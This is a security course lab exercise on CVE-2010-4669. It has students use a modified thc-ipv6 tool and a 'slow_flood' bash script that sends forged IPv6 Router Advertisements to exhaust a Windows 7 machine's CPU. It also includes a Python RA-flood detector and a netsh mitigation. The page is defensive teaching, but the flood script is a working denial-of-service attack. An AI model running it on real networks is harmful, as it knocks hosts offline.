Project 8x: Win 7 DoS by RA Packets (20 pts.)

What you Need

Isolating your Network

The simplest way to do it is to run both the attacker and defender as virtual machines on the same host, and run in NAT networking mode.

Another way to do it is to use a router from the closet in S214 and physically isolate your machines from the rest of the network.

If you do not understand the last two sentences, STOP and do not attempt this project. WAIT until you can get supervision from Sam or another student who understands what network isolation is.

Start the Target Windows 7 Machine

Start the Windows 7 target machine and log in.

Open a Command Prompt and execute the IPCONFIG command. You should see an IPv6 address starting with fe80::, as shown below on this page:

Downloading and Compiling thc-ipv6

BackTrack 4 R2 includes the thc-ipv6 attack toolkit, but for some reason I cannot modify and recompile the tools. And you may be better off using Ubuntu for this project anyway, because IPv6 seems to be very unstable and unreliable in BackTrack. So we will just download the tools and compile them.

In the Linux machine, open Firefox and go to

http://freeworld.thc.org/thc-ipv6

Click the thc-ipv6-1.4.tar.gz link. In the "Opening thc-ipv6-1.4.tar.gz" box, click the "Save File" button. Click OK.

Save the file in the root directory.

On your Linux machine, in a Terminal window, execute these commands:

apt-get install libnet-pcap-perl

apt-get install libpcap0.8-dev

apt-get install libssl-dev

cd /root

tar xzf thc-ipv6-1.4.tar.gz

cd thc-ipv6-1.4

make

Sending a Single Router Advertisement

On the Linux machine, execute these commands:

cd /root/thc-ipv6-1.4

./fake_router6 eth0 1::/64

This starts sending Router Advertisements. Press Ctrl+C to stop it--one RA is all we need.

Observing the New IPv6 Address on the Windows 7 Target Machine

On the Windows 7 target machine, in the Command Prompt window, execute the IPCONFIG command. You should see two IPv6 addresses starting with 1::, as shown below on this page:

These addresses are there because the Stateless Autoconfiguration process is operating by default, creating IPv6 addresses in response to every Router Advertisement packet the Windows 7 machine receives.

The problem is that Windows consumes far too much CPU time to configure these addresses, as we will see below.

Creating the single_ra Attack Tool

The fake_router6 tool sends a series of identical Router Advertisement packets, but we want to send only one. So we need to modify the tool.

On the Linux machine, execute these commands:

cd /root/thc-ipv6-1.4

cp fake_router6.c single_ra.c

nano single_ra.c

Press the down-arrow key to scroll to the end of the file. You should see the last few lines of C code, as shown below on this page:

Move the cursor to the printf command and press Ctrl+K to delete it.

Press Ctrl+K again to delete the while (1) { line.

Press the down-arrow key to move just below the line starting with thc_send.

Press Ctrl+K twice more to delete the sleep(5) line and the line below it.

Your screen should now look like the figure shown below on this page:

Save the file by pressing Ctrl+X, Y, Enter.

Modifying the Makefile

On the Linux machine, execute this command:

nano Makefile

Use the arrow keys to move to the right-hand end of the line beginning with PROGRAMS=.

Append single_ra to the end of that line, as shown below on this page:

Save the file by pressing Ctrl+X, Y, Enter.

On the Linux machine, execute these commands:

make

./single_ra eth0 3::/64

On the Windows 7 target machine, in the Command Prompt window, execute the IPCONFIG command. You should see IPv6 addresses starting with 3::, as shown below on this page:

Creating the slow_flood Tool

On the Linux machine, execute this command:

nano slow_flood

Enter this program into the editor, as shown below on this page:

#!/bin/bash
# Usage: ./slow_flood N
# Sends N Router Advertisements, each for a different /64 prefix, then
# sleeps one second; repeats for 100 rounds (networks 4:1 through 4:100).
# Assumes single_ra is in the current directory and the target is on eth0.

for i in {1..100}
do
      for j in $(eval echo {1..$1})
      do
           ./single_ra eth0 "4:$i:$j::/64"
      done
      echo "Sent $1 RAs for network 4:$i"
      sleep 1
done

Save the file by pressing Ctrl+X, Y, Enter.

On the Linux machine, execute these commands:

chmod a+x slow_flood

./slow_flood 1

You should see messages scrolling by on the Linux machine, like this:

On the Windows 7 target, in a Command Prompt window, execute the IPCONFIG command. You should see a lot of IPv6 addresses, as shown below on this page:

Saving the Image

Save a screen image showing many IPv6 addresses. Give it a filename of Proj 8x from YOUR NAME.

Restoring the Windows Target to a Normal State

On the Linux machine, if the slow_flood attack is still running, type Ctrl+C to stop it.

If the Windows machine is unresponsive, you will need to power it off and start it again.

If the Windows machine still works, click Start and type in NETWORK CONNECTIONS. Click View network connections. Right-click "Local Area Connection" and click Disable.

Right-click "Local Area Connection" and click Enable.

In a Command Prompt window, execute the IPCONFIG command. Verify that all the extra IPv6 addresses are gone.

Measuring the Burden on the Windows Target

On the Windows target, right-click the taskbar at the bottom of the desktop and click Start Task Manager.

In Task Manager, click the Performance tab. The CPU Usage History should be near 0%, as shown in the figure below on this page:

Restarting the Attack

On the Linux machine, execute this command:

./slow_flood 1

You should see the CPU usage rise to a steady value during the attack, as shown below on this page. On my system, one RA per second caused a CPU usage of about 21%.

Testing Faster Attacks

On the Linux machine, try other numbers of RAs per second and see how many it takes to stop the Windows target completely, such as 6 RAs per second with this command:

./slow_flood 6

In my tests, 6 RAs per second were enough to use 100% of the CPU.
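From the detection side, here is an added example that is not part of the original project page: it decodes the Prefix Information options of Router Advertisement packets and flags any sender that advertises six or more distinct prefixes within one second, the rate reported above as saturating the target's CPU. The packet builder and the traffic sample are constructed only to produce test input; the MAC addresses and the 2001:db8 prefix are placeholders.

```python
import struct
import ipaddress
from collections import defaultdict

ND_ROUTER_ADVERT = 134   # ICMPv6 type for Router Advertisement
OPT_PREFIX_INFO = 3      # Neighbor Discovery option: Prefix Information

def build_ra(prefix, plen=64, lifetime=1800):
    """Constructed RA payload (ICMPv6 header + one Prefix Information option).
    Checksum is left zero; this exists only to generate sample input."""
    hdr = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0, lifetime, 0, 0)
    opt = struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, plen, 0xC0, 2592000, 604800, 0)
    return hdr + opt + ipaddress.IPv6Address(prefix).packed

def parse_ra_prefixes(payload):
    """Return [(prefix, length), ...] advertised by an RA payload.
    Non-RA packets and truncated or zero-length options yield no prefixes."""
    if len(payload) < 16 or payload[0] != ND_ROUTER_ADVERT:
        return []
    prefixes, off = [], 16            # options start after the 16-byte RA header
    while off + 2 <= len(payload):
        otype, olen = payload[off], payload[off + 1] * 8   # length is in 8-octet units
        if olen == 0 or off + olen > len(payload):
            break
        if otype == OPT_PREFIX_INFO and olen == 32:
            plen = payload[off + 2]
            addr = ipaddress.IPv6Address(payload[off + 16:off + 32])
            prefixes.append((str(addr), plen))
        off += olen
    return prefixes

def ra_flood_alerts(events, threshold=6):
    """events: iterable of (timestamp_seconds, source_mac, ra_payload).
    Returns (source, second, count) for every sender that advertised at least
    `threshold` distinct prefixes within a single second."""
    seen = defaultdict(set)
    for ts, src, payload in events:
        for pfx in parse_ra_prefixes(payload):
            seen[(src, int(ts))].add(pfx)
    return sorted((src, sec, len(p)) for (src, sec), p in seen.items() if len(p) >= threshold)

# Constructed traffic: a legitimate router advertising one prefix, then a second
# host advertising a fresh /64 per packet, six packets within one second.
SAMPLE_EVENTS = [(0.0, "00:11:22:33:44:55", build_ra("2001:db8:1::"))]
SAMPLE_EVENTS += [(10 + (j - 1) / 6, "66:77:88:99:aa:bb", build_ra(f"4:1:{j}::"))
                  for j in range(1, 7)]

if __name__ == "__main__":
    for src, sec, n in ra_flood_alerts(SAMPLE_EVENTS):
        print(f"RA flood from {src}: {n} distinct prefixes in second {sec}")
```

The same per-second counter can be fed from a packet capture by handing it each ICMPv6 payload together with its source MAC and timestamp.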

Mitigation

As far as I know, there is no patch yet from Microsoft. Disabling IPv6 protects your Windows machines, but that is an excessively drastic solution. I therefore recommend turning off Router Discovery.

On the Windows target, click Start and type in CMD. In the Search Results, right-click "cmd - Shortcut" and click "Run as administrator". In the "User Account Control" box, click Yes.

In the Administrator Command Prompt window, enter this command, and then press the Enter key:

netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled

Showing that the Attack is Now Harmless

On the Linux machine, restart an attack that is fast enough to heavily burden the Windows machine, such as:

./slow_flood 6

The Windows machine should no longer show a high CPU from this attack, as shown below on this page.

Turning In Your Project

Email the image to [email protected] with a subject line of Proj 8x from YOUR NAME.

References

I found that solution here:

http://social.technet.microsoft.com/Forums/en-US/w7itpronetworking/thread/768252f8-8872-453b-aa8f-1c4fd6c52856

Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability

CVE-2010-4669 - Router Advertisements Cause DoS in Windows


Last modified 11:30 pm 4-7-11